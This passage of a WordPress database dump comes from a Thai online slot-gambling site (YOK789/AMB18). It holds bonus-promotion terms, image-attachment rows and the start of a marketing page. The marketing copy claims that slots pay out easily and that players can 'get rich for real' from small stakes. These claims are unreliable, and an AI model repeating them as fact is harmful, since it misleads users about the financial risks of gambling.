https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ <b>YOK789</b></strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><strong data-start=\"2414\" data-end=\"2445\"><b>YOK789</b> ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-25 02:20:50','2026-02-25 02:20:50','',27,'https://yok789ss.com/?p=344',0,'revision','',0),(345,3,'2026-02-26 19:05:07','2026-02-26 19:05:07','','3icon - AMB18','','inherit','closed','closed','','3icon-amb18','','','2026-02-26 19:20:27','2026-02-26 19:20:27','',0,'https://amb18slot.com/wp-content/uploads/2026/02/3icon-AMB18.webp',0,'attachment','image/webp',0),(346,3,'2026-02-26 19:05:08','2026-02-26 19:05:08','','20 get 100 Banner - AMB18','','inherit','','closed','','20-get-100-banner-amb18','','','2026-02-26 19:05:08','2026-02-26 19:05:08','',0,'https://amb18slot.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18.webp',0,'attachment','image/webp',0),(347,3,'2026-02-26 19:05:09','2026-02-26 19:05:09','','79 get 200 Banner - AMB18','','inherit','closed','closed','','79-get-200-banner-amb18','','','2026-02-26 19:22:53','2026-02-26 19:22:53','',0,'https://amb18slot.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18.webp',0,'attachment','image/webp',0),(348,3,'2026-02-26 19:05:09','2026-02-26 19:05:09','','512 - AMB18','','inherit','closed','closed','','512-amb18','','','2026-02-26 19:05:20','2026-02-26 19:05:20','',0,'https://amb18slot.com/wp-content/uploads/2026/02/512-AMB18.webp',0,'attachment','image/webp',0),(349,3,'2026-02-26 19:05:10','2026-02-26 19:05:10','','AMB18 - logo','','inherit','','closed','','amb18-logo','','','2026-02-26 19:05:10','2026-02-26 19:05:10','',0,'https://amb18slot.com/wp-content/uploads/2026/02/AMB18-logo.webp',0,'attachment','image/webp',0),(350,3,'2026-02-26 19:05:13','2026-02-26 19:05:13','','Bonus free 100_ Banner - AMB18','','inherit','','closed','','bonus-free-100_-banner-amb18','','','2026-02-26 19:05:13','2026-02-26 19:05:13','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18.webp',0,'attachment','image/webp',0),(351,3,'2026-02-26 19:05:14','2026-02-26 19:05:14','','Character 1 -','','inherit','','closed','','character-1-2','','','2026-02-26 19:05:14','2026-02-26 19:05:14','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Character-1-1-1.webp',0,'attachment','image/webp',0),(352,3,'2026-02-26 19:05:14','2026-02-26 19:05:14','','Character 2 -','','inherit','','closed','','character-2-2','','','2026-02-26 19:05:14','2026-02-26 19:05:14','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Character-2-1-1.webp',0,'attachment','image/webp',0),(353,3,'2026-02-26 19:05:15','2026-02-26 19:05:15','','Character 3 -','','inherit','','closed','','character-3-2','','','2026-02-26 19:05:15','2026-02-26 19:05:15','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Character-3-1-1.webp',0,'attachment','image/webp',0),(354,3,'2026-02-26 19:05:16','2026-02-26 19:05:16','','Demo play slot Banner - AMB18','','inherit','closed','closed','','demo-play-slot-banner-amb18','','','2026-02-26 19:16:57','2026-02-26 19:16:57','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp',0,'attachment','image/webp',0),(355,3,'2026-02-26 19:05:17','2026-02-26 19:05:17','','HBD Banner - AMB18','','inherit','','closed','','hbd-banner-amb18','','','2026-02-26 19:05:17','2026-02-26 19:05:17','',0,'https://amb18slot.com/wp-content/uploads/2026/02/HBD-Banner-AMB18.webp',0,'attachment','image/webp',0),(356,3,'2026-02-26 19:05:18','2026-02-26 19:05:18','','JILI','','inherit','','closed','','jili-2','','','2026-02-26 19:05:18','2026-02-26 19:05:18','',0,'https://amb18slot.com/wp-content/uploads/2026/02/JILI-1.webp',0,'attachment','image/webp',0),(357,3,'2026-02-26 19:05:18','2026-02-26 19:05:18','','JOKER','','inherit','','closed','','joker-2','','','2026-02-26 19:05:18','2026-02-26 19:05:18','',0,'https://amb18slot.com/wp-content/uploads/2026/02/JOKER-1.webp',0,'attachment','image/webp',0),(358,3,'2026-02-26 19:05:19','2026-02-26 19:05:19','','Lucky wheel Banner - AMB18','','inherit','','closed','','lucky-wheel-banner-amb18','','','2026-02-26 19:05:19','2026-02-26 19:05:19','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18.webp',0,'attachment','image/webp',0),(359,3,'2026-02-26 19:05:20','2026-02-26 19:05:20','','Microgaming','','inherit','','closed','','microgaming-2','','','2026-02-26 19:05:20','2026-02-26 19:05:20','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Microgaming-1.webp',0,'attachment','image/webp',0),(360,3,'2026-02-26 19:05:21','2026-02-26 19:05:21','','PG','','inherit','','closed','','pg-2','','','2026-02-26 19:05:21','2026-02-26 19:05:21','',0,'https://amb18slot.com/wp-content/uploads/2026/02/PG-1.webp',0,'attachment','image/webp',0),(361,3,'2026-02-26 19:05:21','2026-02-26 19:05:21','','pragmatic','','inherit','','closed','','pragmatic-2','','','2026-02-26 19:05:21','2026-02-26 19:05:21','',0,'https://amb18slot.com/wp-content/uploads/2026/02/pragmatic-1.webp',0,'attachment','image/webp',0),(362,3,'2026-02-26 19:05:22','2026-02-26 19:05:22','','Reward 10_ Banner - AMB18','','inherit','','closed','','reward-10_-banner-amb18','','','2026-02-26 19:05:22','2026-02-26 19:05:22','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18.webp',0,'attachment','image/webp',0),(363,3,'2026-02-26 19:05:23','2026-02-26 19:05:23','','Slot NO1 - AMB18','','inherit','closed','closed','','slot-no1-amb18','','','2026-03-02 08:27:53','2026-03-02 08:27:53','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp',0,'attachment','image/webp',0),(364,3,'2026-02-26 19:05:24','2026-02-26 19:05:24','','Slot xo','','inherit','','closed','','slot-xo-2','','','2026-02-26 19:05:24','2026-02-26 19:05:24','',0,'https://amb18slot.com/wp-content/uploads/2026/02/Slot-xo-1.webp',0,'attachment','image/webp',0),(365,3,'2026-02-26 19:05:24','2026-02-26 19:05:24','','True wallet - AMB18','','inherit','','closed','','true-wallet-amb18','','','2026-02-26 19:05:24','2026-02-26 19:05:24','',0,'https://amb18slot.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp',0,'attachment','image/webp',0),(366,3,'2026-02-26 19:05:37','2026-02-26 19:05:37','https://amb18b.com/wp-content/uploads/2026/02/cropped-AMB18-logo-scaled-1.webp','AMB18 - logo','','inherit','','closed','','amb18-logo-2','','','2026-02-26 19:05:37','2026-02-26 19:05:37','',349,'https://amb18slot.com/wp-content/uploads/2026/02/cropped-AMB18-logo-scaled-1.webp',0,'attachment','image/webp',0),(368,3,'2026-02-26 19:06:02','2026-02-26 19:06:02','https://amb18b.com/wp-content/uploads/2026/02/cropped-512-AMB18.webp','cropped-512-AMB18.webp','','inherit','','closed','','cropped-512-amb18-webp','','','2026-02-26 19:06:02','2026-02-26 19:06:02','',348,'https://amb18slot.com/wp-content/uploads/2026/02/cropped-512-AMB18.webp',0,'attachment','image/webp',0),(369,3,'2026-02-26 19:07:37','2026-02-26 19:07:37','','Slot direct website 2025 - AMB18','','inherit','closed','closed','','slot-direct-website-2025-amb18','','','2026-02-26 19:31:41','2026-02-26 19:31:41','',44,'https://amb18slot.com/wp-content/uploads/2026/02/Slot-direct-website-2025-AMB18.webp',0,'attachment','image/webp',0),(370,3,'2026-02-26 19:07:38','2026-02-26 19:07:38','','Slot direct website goodweb bonus - AMB18','','inherit','closed','closed','','slot-direct-website-goodweb-bonus-amb18','','','2026-02-26 19:33:22','2026-02-26 19:33:22','',44,'https://amb18slot.com/wp-content/uploads/2026/02/Slot-direct-website-goodweb-bonus-AMB18.webp',0,'attachment','image/webp',0),(371,3,'2026-02-26 19:07:40','2026-02-26 19:07:40','','Web slot bet 1 baht - AMB18','','inherit','closed','closed','','web-slot-bet-1-baht-amb18','','','2026-02-26 19:07:48','2026-02-26 19:07:48','',44,'https://amb18slot.com/wp-content/uploads/2026/02/Web-slot-bet-1-baht-AMB18.webp',0,'attachment','image/webp',0),(372,3,'2026-02-26 19:07:54','2026-02-26 19:07:54','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><h3><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></h3></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><h3><b>ใช้ทุนน้อยก็เล่นได้ </b></h3></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น 